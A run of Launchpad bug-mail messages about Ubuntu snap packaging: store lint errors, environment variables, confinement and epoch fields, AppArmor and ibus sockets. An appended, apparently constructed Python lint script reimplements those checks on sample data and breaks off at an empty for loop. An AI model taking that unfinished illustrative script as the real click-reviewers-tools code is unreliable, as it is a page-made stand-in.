Status in Canonical Click Reviewers tools: Fix Released
Status in click-reviewers-tools package in Ubuntu: Fix Released
Status in click-reviewers-tools source package in Xenial: New
Status in click-reviewers-tools source package in Yakkety: Fix Released

Bug description:

I think this bug is an issue of the ubuntu store, if this is not the correct project to report to, please re-assign to the correct one.

When I upload my package to the store, it reports this failure:

package contains external symlinks: usr/lib/x86_64-linux-gnu/libmvec.so lint-snap-v2_external_symlinks

But ubuntu-core has the necessary file:

$ ls -l /snap/ubuntu-core/current/lib/x86_64-linux-gnu/libmvec*
-rw-r--r-- 1 root root 166368 Apr 15 06:16 /snap/ubuntu-core/current/lib/x86_64-linux-gnu/libmvec-2.23.so
lrwxrwxrwx 1 root root     15 Apr 15 06:16 /snap/ubuntu-core/current/lib/x86_64-linux-gnu/libmvec.so.1 -> libmvec-2.23.so

This is in my snap:

$ ls -l /snap/shadowsocks/current/usr/lib/x86_64-linux-gnu/libmvec.so*
lrwxrwxrwx 1 root root 34 Apr 15 06:17 /snap/shadowsocks/current/usr/lib/x86_64-linux-gnu/libmvec.so -> /lib/x86_64-linux-gnu/libmvec.so.1

/lib/x86_64-linux-gnu/libmvec.so.1 was not in a previous version of ubuntu-core, so I wonder if this failure is due to the check in ubuntu store is not up-to-date?
[Group.of.nepali.translators] [Bug 1583259] Re: Snappy needs to influence environment variables in applications
Fixed review tools in upstream 0.44 and in 16.10.

** Also affects: click-reviewers-tools (Ubuntu)
   Importance: Undecided
       Status: New

** Also affects: click-reviewers-tools (Ubuntu Xenial)
   Importance: Undecided
       Status: New

** Also affects: click-reviewers-tools (Ubuntu Yakkety)
   Importance: Undecided
       Status: New

** Changed in: click-reviewers-tools
       Status: Fix Committed => Fix Released

** Changed in: click-reviewers-tools (Ubuntu Yakkety)
       Status: New => Fix Released

https://bugs.launchpad.net/bugs/1583259

Title:
  Snappy needs to influence environment variables in applications

Status in Canonical Click Reviewers tools: Fix Released
Status in Snappy Launcher: Invalid
Status in Snapcraft: Triaged
Status in Snappy: New
Status in click-reviewers-tools package in Ubuntu: Fix Released
Status in click-reviewers-tools source package in Xenial: New
Status in click-reviewers-tools source package in Yakkety: Fix Released

Bug description:

[Impact]

* Adding an environment keyword to snapcraft.yaml, which will make it to snap.yaml which the launcher will use to setup the environment.
* This reduces the amount of wrapper files.

[Test Case]

1. Run `snapcraft` on the ros demo.
2. Install the snap.
3. snap should run. (if it doesn't it mostly likely means the environment was setup incorrectly).
4. snap.yaml's `assumes` gets a `snap-run` tag.

[Regression Potential]

* Very low. Environment that was previously setup by wrapper scripts could be missing when the launcher launches using the environment keyword.
* The use of `assumes` will make sure this doesn't break people on older versions of snapd or snap-run

--

We see a common pattern across many snaps, all apps are really using wrappers to set environment variables.

I'd like to propose that this is exposed as a first class feature in snapcraft (same like plugs and slots), snappy (where interfaces can affect variables and snappy can have sensible defaults) and ubuntu-core-launcher (to actually apply those variables to each started process).

As a bit of context, this is a wrapper for a non trivial but still common app: the calculator:

https://bazaar.launchpad.net/~ubuntu-desktop/+junk/gnome-calculator-snap/view/head:/calc#L3

The wrapper is 44 lines long, all of which set up environment variables.

Support environment variable that would be available to snaps. The form should look like

snapcraft.yaml
name: ...
version: ...
...
environment: # these apply to all snaps
  ENV1: value1
  ENV2: value2
apps:
  app1:
    ...
    environment:
      ENV1: value1 # takes precedence over global ones

These environment values would be transported to snap.yaml
[Group.of.nepali.translators] [Bug 1595184] Re: tools do not handled abbreviated toplevel slots and plugs syntax correctly
Fixed in upstream 0.44 and in 16.10.

** Also affects: click-reviewers-tools (Ubuntu)
   Importance: Undecided
   Status: New

** Also affects: click-reviewers-tools (Ubuntu Yakkety)
   Importance: Undecided
   Status: New

** Also affects: click-reviewers-tools (Ubuntu Xenial)
   Importance: Undecided
   Status: New

** Changed in: click-reviewers-tools (Ubuntu Yakkety)
   Status: New => Fix Released

https://bugs.launchpad.net/bugs/1595184

Title:
  tools do not handled abbreviated toplevel slots and plugs syntax correctly

Status in Canonical Click Reviewers tools: Fix Released
Status in click-reviewers-tools package in Ubuntu: Fix Released
Status in click-reviewers-tools source package in Xenial: New
Status in click-reviewers-tools source package in Yakkety: Fix Released

Bug description:
  This should be valid, but the review tools flag it as an error:

  apps:
    networkmanager:
      command: command-networkmanager.wrapper
      daemon: simple
      slots:
        - service
    nmcli:
      command: command-nmcli.wrapper
      plugs:
        - nmcli
  architectures:
    - amd64
  confinement: strict
  description: ...
  name: network-manager
  plugs:
    nmcli: network-manager
  slots:
    service: network-manager
  summary: Network management framework
  version: 1.2.2-1

  With the above, the tools error with:

  unknown interface 'service'
    lint-snap-v2_slots (service, service)
  unknown interface 'nmcli'
    lint-snap-v2_plugs (nmcli, nmcli)

To manage notifications about this bug go to:
https://bugs.launchpad.net/click-reviewers-tools/+bug/1595184/+subscriptions
[Group.of.nepali.translators] [Bug 1608943] Re: rename of click-reviewers LP group broke fetch of apparmor json
Fixed in upstream 0.44.

** Description changed:

+ 
+ Test Case
+ $ rm -f ~/.cache/click-reviewers-tools/apparmor-easyprof-ubuntu.json
+ $ click-review /path/to/click
+ 
+ 
+ Original description:
+ 
  WARNING:root:Ignoring missing framework "ubuntu-sdk-15.04"
  Now executing: click-review ./qsa3.nessita_0.2_all.click
  Traceback (most recent call last):
-   File "/usr/bin/click-review", line 162, in
-     main()
-   File "/usr/bin/click-review", line 156, in main
-     results.run_all_checks(overrides)
-   File "/usr/bin/click-review", line 110, in run_all_checks
-     self._run_module_checks(module, overrides)
-   File "/usr/bin/click-review", line 97, in _run_module_checks
-     review.do_checks()
-   File "/usr/lib/python3/dist-packages/clickreviews/common.py", line 384, in do_checks
-     func()
-   File "/usr/lib/python3/dist-packages/clickreviews/cr_security.py", line 691, in check_policy_groups
-     if len(policy_groups) < 1:
+   File "/usr/bin/click-review", line 162, in
+     main()
+   File "/usr/bin/click-review", line 156, in main
+     results.run_all_checks(overrides)
+   File "/usr/bin/click-review", line 110, in run_all_checks
+     self._run_module_checks(module, overrides)
+   File "/usr/bin/click-review", line 97, in _run_module_checks
+     review.do_checks()
+   File "/usr/lib/python3/dist-packages/clickreviews/common.py", line 384, in do_checks
+     func()
+   File "/usr/lib/python3/dist-packages/clickreviews/cr_security.py", line 691, in check_policy_groups
+     if len(policy_groups) < 1:
  TypeError: object of type 'NoneType' has no len()
  Successfully built package in './qsa3.nessita_0.2_all.click'.
  
  This is because clickreviews/apparmor_policy.py has a link to ~click-reviewers instead of ~store-reviewers.
  
  This is fixed in r694

** Changed in: click-reviewers-tools (Ubuntu Yakkety)
   Status: In Progress => Fix Committed

** Changed in: click-reviewers-tools
   Status: Fix Committed => Fix Released

https://bugs.launchpad.net/bugs/1608943

Title:
  rename of click-reviewers LP group broke fetch of apparmor json

Status in Canonical Click Reviewers tools: Fix Released
Status in click-reviewers-tools package in Ubuntu: Fix Committed
Status in click-reviewers-tools source package in Xenial: Triaged
Status in click-reviewers-tools source package in Yakkety: Fix Committed

Bug description:
  Test Case
  $ rm -f ~/.cache/click-reviewers-tools/apparmor-easyprof-ubuntu.json
  $ click-review /path/to/click

  Original description:

  WARNING:root:Ignoring missing framework "ubuntu-sdk-15.04"
  Now executing: click-review ./qsa3.nessita_0.2_all.click
  Traceback (most recent call last):
    File "/usr/bin/click-review", line 162, in
      main()
    File "/usr/bin/click-review", line 156, in main
      results.run_all_checks(overrides)
    File "/usr/bin/click-review", line 110, in run_all_checks
      self._run_module_checks(module, overrides)
    File "/usr/bin/click-review", line 97, in _run_module_checks
      review.do_checks()
    File "/usr/lib/python3/dist-packages/clickreviews/common.py", line 384, in do_checks
      func()
    File "/usr/lib/python3/dist-packages/clickreviews/cr_security.py", line 691, in check_policy_groups
      if len(policy_groups) < 1:
  TypeError: object of type 'NoneType' has no len()
  Successfully built package in './qsa3.nessita_0.2_all.click'.

  This is because clickreviews/apparmor_policy.py has a link to ~click-reviewers instead of ~store-reviewers.

  This is fixed in r694

To manage notifications about this bug go to:
https://bugs.launchpad.net/click-reviewers-tools/+bug/1608943/+subscriptions
[Group.of.nepali.translators] [Bug 1606277] Re: log-observe interface is broken in latest snap-confine
1.0.38-2 is still affected. Marking as In Progress because the snappy team is working to get 1.0.39 there too.

** Also affects: snap-confine (Ubuntu Yakkety)
   Importance: Undecided
   Status: New

** Changed in: snap-confine (Ubuntu Yakkety)
   Status: New => In Progress

https://bugs.launchpad.net/bugs/1606277

Title:
  log-observe interface is broken in latest snap-confine

Status in Snappy Launcher: Fix Released
Status in snap-confine package in Ubuntu: In Progress
Status in snap-confine source package in Xenial: Fix Committed
Status in snap-confine source package in Yakkety: In Progress

Bug description:
  The log-observe interface is broken due to how we handle bind mounts now. This can be seen with 'snappy-debug':

  $ sudo snap install snappy-debug
  $ sudo snap connect snappy-debug:log-observe ubuntu-core:log-observe
  $ sudo /snap/bin/snappy-debug.security scanlog
  kernel.printk_ratelimit = 0
  Traceback (most recent call last):
    File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 580, in
      sys.exit(main())
    File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 569, in main
      from_end=opt.only_new)
    File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 92, in __init__
      self.scan_log(log_file, snap_name, follow, from_end)
    File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 157, in scan_log
      log = open_file_read(log_file)
    File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 71, in open_file_read
      orig = codecs.open(path, 'r', "UTF-8", errors="replace")
    File "/usr/lib/python3.5/codecs.py", line 895, in open
      file = builtins.open(filename, mode, buffering)
  FileNotFoundError: [Errno 2] No such file or directory: '/var/log/syslog'

  This is because /var/log/syslog is not available at runtime due to the bind mounts.

  This can be shown by installing hello-world, adjusting /var/lib/snapd/apparmor/profiles/snap.hello-world.sh to have "/**/ r," (to be able to read any directory), reloading the profile, then doing:

  $ hello-world.sh
  ...
  bash-4.3$ ls /var/log/
  alternatives.log  btmp  dpkg.log  fsck  watchdog  bootstrap.log  dmesg  faillog  lastlog  wtmp

  This may also be a problem with other interfaces. I haven't checked extensively, though it seems that /var/lib/extrausers (from the nameservice abstraction) won't work right, and (at least) ppp (/var/log/ppp) and timezone-control (/usr/share/zoneinfo) are also affected.

  WORKAROUND for snappy-debug: launch outside of the launcher:
  $ sudo SNAP=/snap/snappy-debug/current PATH=$PATH:/snap/snappy-debug/current/bin /snap/snappy-debug/current/bin/snappy-security scanlog

To manage notifications about this bug go to:
https://bugs.launchpad.net/snap-confine/+bug/1606277/+subscriptions
[Group.of.nepali.translators] [Bug 1576308] Re: gsettings doesn't work with snap confinement
This is fixed in snapd 2.11+16.10 on Ubuntu 16.10.

** Changed in: snapd (Ubuntu Yakkety)
   Status: Fix Committed => Fix Released

https://bugs.launchpad.net/bugs/1576308

Title:
  gsettings doesn't work with snap confinement

Status in snapd package in Ubuntu: Fix Released
Status in snapd source package in Xenial: Fix Released
Status in snapd source package in Yakkety: Fix Released

Bug description:
  Work is needed there, see
  https://wiki.ubuntu.com/SecurityTeam/Specifications/ApplicationConfinement#GSettings.2Fdconf

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1576308/+subscriptions
[Group.of.nepali.translators] [Bug 1576308] Re: gsettings doesn't work with snap confinement
This bug is about the security policy related to accessing global gsettings. That policy has been added and is available in 2.0.7, and 2.0.8 is available in xenial-updates now, so marking Fix Released. yakkety is still at 2.0.2 with 2.0.9 in yakkety-proposed, so marking Fix Committed.

Seb and I discussed on IRC the issue he was facing that prompted the change to the bug status, so reverting his changes. There is work to do for the snap to find the session gsettings files due to how HOME is set, but the security policy allows it now. Please file a new bug if something needs to change in snapd for this issue. Thanks!

** Changed in: snapd (Ubuntu Xenial)
   Status: Triaged => Fix Released

** Changed in: snapd (Ubuntu Yakkety)
   Status: Triaged => Fix Committed

https://bugs.launchpad.net/bugs/1576308

Title:
  gsettings doesn't work with snap confinement

Status in snapd package in Ubuntu: Fix Committed
Status in snapd source package in Xenial: Fix Released
Status in snapd source package in Yakkety: Fix Committed

Bug description:
  Work is needed there, see
  https://wiki.ubuntu.com/SecurityTeam/Specifications/ApplicationConfinement#GSettings.2Fdconf

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/snapd/+bug/1576308/+subscriptions
[Group.of.nepali.translators] [Bug 1588886] Re: no indication that a user needs to connect the home Plug to the home Slot to make a snap access files in the homedir
This is fixed in 2.0.7, so marking the upstream task as Fix Released. snapd 2.0.8 is in yakkety-proposed, so marking it as Fix Committed. Marking xenial as 'verification-done' based on the reporter's feedback.

** Tags removed: verification-needed
** Tags added: verification-done

** Changed in: snapd (Ubuntu)
   Status: New => Fix Committed

** Changed in: snappy
   Status: Fix Committed => Fix Released

https://bugs.launchpad.net/bugs/156

Title:
  no indication that a user needs to connect the home Plug to the home Slot to make a snap access files in the homedir

Status in Snappy: Fix Released
Status in snapd package in Ubuntu: Fix Committed
Status in snapd source package in Xenial: Fix Committed

Bug description:
  Krita snap, can't save/load images outside confinement ~/snap/krita
  tried to load an image from my desktop but I get an error message

To manage notifications about this bug go to:
https://bugs.launchpad.net/snappy/+bug/156/+subscriptions
[Group.of.nepali.translators] [Bug 1580463] Re: Snap blocks access to system input methods (ibus, fctix, ...)
** Also affects: apparmor (Ubuntu)
   Importance: Undecided
   Status: New

** Changed in: apparmor (Ubuntu Xenial)
   Status: New => Triaged

** Changed in: apparmor (Ubuntu Yakkety)
   Status: New => In Progress

** Changed in: apparmor (Ubuntu Xenial)
   Importance: Undecided => Medium

** Changed in: apparmor (Ubuntu Yakkety)
   Importance: Undecided => Medium

** Changed in: apparmor (Ubuntu Xenial)
   Assignee: (unassigned) => Tyler Hicks (tyhicks)

** Changed in: apparmor (Ubuntu Yakkety)
   Assignee: (unassigned) => Tyler Hicks (tyhicks)

https://bugs.launchpad.net/bugs/1580463

Title:
  Snap blocks access to system input methods (ibus, fctix, ...)

Status in apparmor package in Ubuntu: In Progress
Status in im-config package in Ubuntu: Fix Released
Status in snapd package in Ubuntu: Confirmed
Status in apparmor source package in Xenial: Triaged
Status in im-config source package in Xenial: In Progress
Status in snapd source package in Xenial: New
Status in apparmor source package in Yakkety: In Progress
Status in im-config source package in Yakkety: Fix Released
Status in snapd source package in Yakkety: Confirmed

Bug description:
  = SRU im-config =

  [Impact]
  ibus-daemon by default uses a unix socket name of /tmp/dbus-... that is indistinguishable from dbus-daemon abstract sockets. While dbus-daemon has AppArmor mediation, ibus-daemon does not, so it is important that its abstract socket not be confused with dbus-daemon's. By modifying ibus-daemon's start arguments to use "--address 'unix:tmpdir=/tmp/ibus'", AppArmor can continue mediating DBus abstract sockets like normal and also mediate access to the ibus-daemon-specific abstract socket via unix rules. This also tidies up the abstract socket paths so that it is clear which are for ibus-daemon, which for dbus-daemon, etc.

  The upload simply adjusts 21_ibus.rc to start ibus-daemon with "--address 'unix:tmpdir=/tmp/ibus'" and adds a comment. No compiled code changes are required.

  [Test Case]
  1. start a unity session before updating to the package in -proposed
  2. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0
     IBUS_ADDRESS=unix:abstract=/tmp/dbus-Vyx8fGFA,guid=28e8e7e89f902c8d4e9d77c5557add76
  3. $ lsof -p $(pidof ibus-daemon) | grep '/dbus'
     ibus-daem 2973 jamie8u unix 0x 0t0 29606 @/tmp/dbus-oxKYpN30 type=STREAM
  4. update the package in -proposed and perform '2' and '3'. The IBUS_ADDRESSES should be the same as before
  5. logout of unity, then log back in
  6. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0
     IBUS_ADDRESS=unix:abstract=/tmp/ibus/dbus-SpxOl8Fc,guid=06d4bbeb07614c6dffbf221c57473f4e
     (notice '/tmp/ibus/' in the path)
  7. $ lsof -p $(pidof ibus-daemon) | grep '/dbus'
     ibus-daem 3471 jamie8u unix 0x 0t0 26107 @/tmp/ibus/dbus-SpxOl8Fc type=STREAM
     ...
     (notice '@/tmp/ibus/' in the path)

  In addition to the above, you can test for regressions by opening 'System Settings' under the 'gear' icon in the panel and selecting 'Text Entry'. From there, add an input source on the right, make sure 'Show current input source in the menu bar' is checked, then use the input source panel indicator to change input sources.

  [Regression Potential]
  The regression potential is considered low because there are no compiled code changes and because the changes only occur after ibus-daemon is restarted, which is upon session start, not package upgrade. When it is restarted, the files in ~/.config/ibus/bus/*-unix-0 are updated accordingly for other applications to pick up. This change intentionally requires a change to the unity7 snapd interface, which is in progress. Currently the change should not regress snapd's behavior due to other issues surrounding using ibus unrelated to security policy.

  = Original description =
  Currently snaps can't access ibus/fcitx from the system, do we need an interface for input methods there?

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1580463/+subscriptions
[Group.of.nepali.translators] [Bug 1580463] Re: Snap blocks access to system input methods (ibus, fctix, ...)
** Also affects: snapd (Ubuntu Yakkety)
   Importance: Medium
   Status: Incomplete

** Also affects: snapd (Ubuntu Xenial)
   Importance: Undecided
   Status: New

** Also affects: im-config (Ubuntu)
   Importance: Undecided
   Status: New

** Changed in: im-config (Ubuntu Yakkety)
   Status: New => In Progress

** Changed in: im-config (Ubuntu Yakkety)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

https://bugs.launchpad.net/bugs/1580463

Title:
  Snap blocks access to system input methods (ibus, fctix, ...)

Status in im-config package in Ubuntu: In Progress
Status in snapd package in Ubuntu: Incomplete
Status in im-config source package in Xenial: New
Status in snapd source package in Xenial: New
Status in im-config source package in Yakkety: In Progress
Status in snapd source package in Yakkety: Incomplete

Bug description:
  Currently snaps can't access ibus/fcitx from the system, do we need an interface for input methods there?

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/im-config/+bug/1580463/+subscriptions
[Group.of.nepali.translators] [Bug 1572140] Re: click-reviewers-tools don't know opengl interface
Verified that opengl is now recognized:

  - lint-snap-v2:plugs:opengl:opengl
    OK

** Changed in: click-reviewers-tools
   Status: Fix Committed => Fix Released

** Also affects: click-reviewers-tools (Ubuntu)
   Importance: Undecided
   Status: New

** Also affects: click-reviewers-tools (Ubuntu Yakkety)
   Importance: Undecided
   Status: New

** Also affects: click-reviewers-tools (Ubuntu Xenial)
   Importance: Undecided
   Status: New

** Changed in: click-reviewers-tools (Ubuntu Xenial)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: click-reviewers-tools (Ubuntu Yakkety)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: click-reviewers-tools (Ubuntu Yakkety)
   Status: New => Fix Released

** Changed in: click-reviewers-tools (Ubuntu Xenial)
   Status: New => Fix Committed

** Tags removed: verification-needed
** Tags added: verification-done

https://bugs.launchpad.net/bugs/1572140

Title:
  click-reviewers-tools don't know opengl interface

Status in Canonical Click Reviewers tools: Fix Released
Status in click-reviewers-tools package in Ubuntu: Fix Released
Status in click-reviewers-tools source package in Xenial: Fix Committed
Status in click-reviewers-tools source package in Yakkety: Fix Released

Bug description:
  click-reviewers-tools don't know the opengl interface - check ubuntu-clock-app in the store.

To manage notifications about this bug go to:
https://bugs.launchpad.net/click-reviewers-tools/+bug/1572140/+subscriptions
[Group.of.nepali.translators] [Bug 1580819] Re: Add support for confinement property
Verified that 'confinement: strict' properly errors with 'plugs: [ network-control ]':

  Errors
  --
  - security-snap-v2:plug_safe:network-control:network-control
    reserved interface 'network-control' for vetted applications only

and that 'confinement: devmode' shows no error with 'plugs: [ network-control ]'.

** Also affects: click-reviewers-tools (Ubuntu)
   Importance: Undecided
   Status: New

** Changed in: click-reviewers-tools (Ubuntu Yakkety)
   Status: New => Fix Released

** Changed in: click-reviewers-tools (Ubuntu Xenial)
   Status: New => Fix Committed

** Changed in: click-reviewers-tools (Ubuntu Xenial)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: click-reviewers-tools (Ubuntu Yakkety)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Tags removed: verification-needed
** Tags added: verification-done

https://bugs.launchpad.net/bugs/1580819

Title:
  Add support for confinement property

Status in Canonical Click Reviewers tools: Fix Released
Status in Snapcraft: Fix Committed
Status in click-reviewers-tools package in Ubuntu: Fix Released
Status in snapcraft package in Ubuntu: Fix Released
Status in click-reviewers-tools source package in Xenial: Fix Committed
Status in snapcraft source package in Xenial: Fix Committed
Status in click-reviewers-tools source package in Yakkety: Fix Released
Status in snapcraft source package in Yakkety: Fix Released

Bug description:
  [Impact]
  * Snaps need to be able to specify if they require devmode or if they can be run confined. This will allow snapd to provide reasonable errors if one tries to install a snap that cannot run successfully under confinement.
  * The YAML property should be called "confinement," and it should have two options: "devmode" and "strict." It should be optional, and `snapcraft init` should set it to "devmode."
  * The "confinement" YAML property should be copied into the resulting `snap.yaml`.
  * Example YAML:

    name: foo
    version: 1
    summary: foo
    description: foo
    confinement: devmode
    parts:
      foo:
        plugin: nil

  [Test Case]
  * Run `snapcraft init`. Make sure "confinement" is "devmode."
  * Create a valid snapcraft.yaml and run `snapcraft` on it. Make sure the "confinement" value gets copied to the `snap.yaml`.
  * Create a valid snapcraft.yaml and remove the "confinement" property. Run `snapcraft`. It should print a hint about defaulting to "strict", and "confinement: strict" should be in the resulting `snap.yaml`.

  [Regression Potential]
  * snapcraft.yaml validation could be incorrect (required properties may not be required correctly, etc.)

To manage notifications about this bug go to:
https://bugs.launchpad.net/click-reviewers-tools/+bug/1580819/+subscriptions
[Group.of.nepali.translators] [Bug 1583298] Re: Add support for epoch property
$ click-review -v /tmp/foo_1.0_amd64.snap
...
  - lint-snap-v2:epoch_valid
    OK

$ cat meta/snap.yaml
apps:
  bar:
    command: bin/bar
architectures:
- amd64
description: 'stuff here'
name: foo
plugs:
  opengl: null
  pulseaudio: null
  unity7: null
summary: stuff
version: 1.0
epoch: 2

** Tags removed: verification-needed
** Tags added: verification-done

** Also affects: snapd (Ubuntu Yakkety)
   Importance: Wishlist
   Assignee: Kyle Fazzari (kyrofa)
   Status: Fix Committed

** Also affects: snapd (Ubuntu Xenial)
   Importance: Undecided
   Status: New

** Also affects: click-reviewers-tools (Ubuntu)
   Importance: Undecided
   Status: New

** Changed in: click-reviewers-tools (Ubuntu Yakkety)
   Status: New => Fix Released

** Changed in: click-reviewers-tools (Ubuntu Xenial)
   Status: New => Fix Committed

** Changed in: click-reviewers-tools (Ubuntu Yakkety)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: click-reviewers-tools (Ubuntu Xenial)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

https://bugs.launchpad.net/bugs/1583298

Title:
  Add support for epoch property

Status in click-reviewers-tools package in Ubuntu: Fix Released
Status in snapd package in Ubuntu: Fix Committed
Status in click-reviewers-tools source package in Xenial: Fix Committed
Status in snapd source package in Xenial: New
Status in click-reviewers-tools source package in Yakkety: Fix Released
Status in snapd source package in Yakkety: Fix Committed

Bug description:
  In order to support step upgrades, snaps need to be able to specify upgrade paths. The method decided upon to specify said upgrade paths is an optional "epoch" property. Valid values consist of positive integers and an asterisk (e.g. 1 is epoch 1, 1* is the upgrade path from 1 to 2, and 2 is epoch 2). If the epoch is not specified, it should implicitly be 0.

  Example YAML:

    name: foo
    version: 1
    description: foo
    summary: foo
    epoch: 1*

  Note that the API for providing this to the store does not yet exist, so this bug only covers the parsing of this information from the `snap.yaml`.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/click-reviewers-tools/+bug/1583298/+subscriptions
[Group.of.nepali.translators] [Bug 1584231] Re: update to 0.43 (aka, support 'confinement' field in snap v2 yaml)
This was fixed in yakkety in 0.43.

** Changed in: click-reviewers-tools (Ubuntu Yakkety)
   Status: Fix Committed => Fix Released

https://bugs.launchpad.net/bugs/1584231

Title:
  update to 0.43 (aka, support 'confinement' field in snap v2 yaml)

Status in click-reviewers-tools package in Ubuntu: Fix Released
Status in click-reviewers-tools source package in Xenial: In Progress
Status in click-reviewers-tools source package in Yakkety: Fix Released

Bug description:
  [Impact]
  Upgrade to review tools 0.43. The review tools provide lint-style checks for clicks and snaps. This release has several bug fixes and support for new snappy yaml declarations, the most important of which is supporting the 'confinement' property. Here is the complete changelog:

  * sr_lint.py:
    - kernel snaps may have external symlinks
    - handle top-level plugs and slots with yaml data as 'null' (LP: #1579201)
    - add epoch checks (LP: #1583298)
    - .pyc are arch-independent, so don't complain about them
    - add confinement checks (LP: #1580819)
  * data/apparmor-easyprof-ubuntu.json:
    - add opengl interface as 'common' (LP: #1572140)
    - add reserved bluez, network-manager and location-observe interfaces
  * sr_security.py:
    - remove last reference to 'cap'
    - turn resquash test into info for now until the squashfs-tools bugs are fixed and this is a reliable check
  * when 'confinement' is 'devmode', override the result type to 'info'
    - common.py: add override_result_type to allow in support of 'confinement' overrides
    - sr_common.py: add _devmode_override()
    - sr_security.py: use override_result_type if in devmode
    - LP: #1584231

  [Test Case]
  The testsuite tests the above and the store is already using these checks. To verify the package:
  1. install the package
  2. verify click reviews work with: click-review /path/to/click
  3. verify snapv1 reviews work with: click-review /path/to/15.04/snap
  4. verify snapv2 reviews work with: click-review /path/to/16/snap

  [Regression Potential]
  The worst regression is that the lint tool would trace back to the user running it instead of displaying the information. The testsuite is run during the build and is comprehensive, with the added code maintaining 100% coverage for sr_security.py and sr_lint.py; sr_common.py maintains 98% coverage.

  [Other Info]
  The store has been running r651 for weeks with no issues. r652 and later are to support the new snappy 'confinement' and 'epoch' fields as per the spec and fix a few minor issues. The store will land this next week and if there are regressions there, I will update this bug.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/click-reviewers-tools/+bug/1584231/+subscriptions
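The checks the messages above describe (abbreviated top-level plugs/slots syntax from bug 1595184, the 'confinement' property and reserved-interface plug_safe error from bug 1580819, the 'epoch' values from bug 1583298, and the devmode override of security results to 'info' from the 0.43 changelog) are illustrated below by a small stand-alone lint written for this page; it is not the click-reviewers-tools code. The interface lists are constructed stand-ins (the real tool reads apparmor-easyprof-ubuntu.json), and the sample snap.yaml data is embedded as dicts built from the bugs' examples rather than parsed with PyYAML so it runs offline.

```python
import re

# Interfaces the 0.43 changelog marks as reserved ("for vetted applications only").
RESERVED_INTERFACES = {"network-control", "bluez", "network-manager", "location-observe"}
# Constructed stand-in for the interface list; the real tool reads apparmor-easyprof-ubuntu.json.
COMMON_INTERFACES = {"network", "network-bind", "home", "opengl", "unity7", "pulseaudio",
                     "log-observe"}
KNOWN_INTERFACES = COMMON_INTERFACES | RESERVED_INTERFACES

# epoch: a positive integer with an optional trailing '*' (1, 1*, 2). A missing epoch is
# implicitly 0; accepting an explicit 0 as well is an assumption of this example.
EPOCH_RE = re.compile(r"^(0|[1-9][0-9]*)\*?$")


def interface_of(name, decl):
    """Resolve the interface name of one top-level 'plugs:'/'slots:' entry."""
    if decl is None:             # opengl: null            -> interface 'opengl'
        return name
    if isinstance(decl, str):    # nmcli: network-manager  -> interface 'network-manager'
        return decl
    if isinstance(decl, dict):   # foo: {interface: bar}   -> 'bar' (defaults to the key)
        return decl.get("interface", name)
    raise TypeError("unsupported declaration for %r: %r" % (name, decl))


def lint_snap_yaml(snap):
    """Review-tool style checks on a parsed snap.yaml dict -> [(result_type, check, message)]."""
    results = []

    confinement = snap.get("confinement", "strict")   # missing -> strict
    if confinement not in ("strict", "devmode"):
        results.append(("error", "lint-snap-v2:confinement_valid",
                        "invalid confinement '%s'" % confinement))

    epoch = str(snap.get("epoch", 0))                 # YAML may give int 2 or str '1*'
    if EPOCH_RE.match(epoch):
        results.append(("info", "lint-snap-v2:epoch_valid", "OK"))
    else:
        results.append(("error", "lint-snap-v2:epoch_valid", "invalid epoch '%s'" % epoch))

    for kind in ("plugs", "slots"):
        # name -> interface for top-level entries (abbreviated or full form) ...
        refs = {name: interface_of(name, decl)
                for name, decl in (snap.get(kind) or {}).items()}
        # ... and for app-level references; a bare name that is not a top-level
        # entry refers to the interface directly (e.g. plugs: [ network-control ]).
        for appdef in (snap.get("apps") or {}).values():
            for ref in appdef.get(kind) or []:
                refs.setdefault(ref, ref)

        for name, iface in refs.items():
            check = "lint-snap-v2:%s:%s:%s" % (kind, name, iface)
            if iface not in KNOWN_INTERFACES:
                results.append(("error", check, "unknown interface '%s'" % iface))
                continue
            results.append(("info", check, "OK"))
            # Reserved interfaces may only be plugged by vetted applications.
            if kind == "plugs" and iface in RESERVED_INTERFACES:
                results.append(("error", "security-snap-v2:plug_safe:%s:%s" % (name, iface),
                                "reserved interface '%s' for vetted applications only" % iface))

    # devmode: security results are downgraded to 'info'; lint results stay errors.
    if confinement == "devmode":
        results = [("info" if rtype == "error" and check.startswith("security-snap-v2:")
                    else rtype, check, msg) for rtype, check, msg in results]
    return results


def errors(results):
    """The (check, message) pairs that would block a store review."""
    return [(check, msg) for rtype, check, msg in results if rtype == "error"]


# Sample snap.yaml data, constructed from the examples in the bugs above.
NETWORK_MANAGER_SNAP = {
    "name": "network-manager", "version": "1.2.2-1", "confinement": "strict",
    "apps": {
        "networkmanager": {"command": "command-networkmanager.wrapper",
                           "daemon": "simple", "slots": ["service"]},
        "nmcli": {"command": "command-nmcli.wrapper", "plugs": ["nmcli"]},
    },
    "plugs": {"nmcli": "network-manager"},   # abbreviated top-level syntax
    "slots": {"service": "network-manager"},
}
STRICT_NETWORK_CONTROL = {
    "name": "foo", "version": "1", "confinement": "strict", "epoch": "1*",
    "apps": {"bar": {"command": "bin/bar", "plugs": ["network-control"]}},
}
DEVMODE_NETWORK_CONTROL = dict(STRICT_NETWORK_CONTROL, confinement="devmode")

if __name__ == "__main__":
    for label, snap in [("network-manager", NETWORK_MANAGER_SNAP),
                        ("strict", STRICT_NETWORK_CONTROL),
                        ("devmode", DEVMODE_NETWORK_CONTROL)]:
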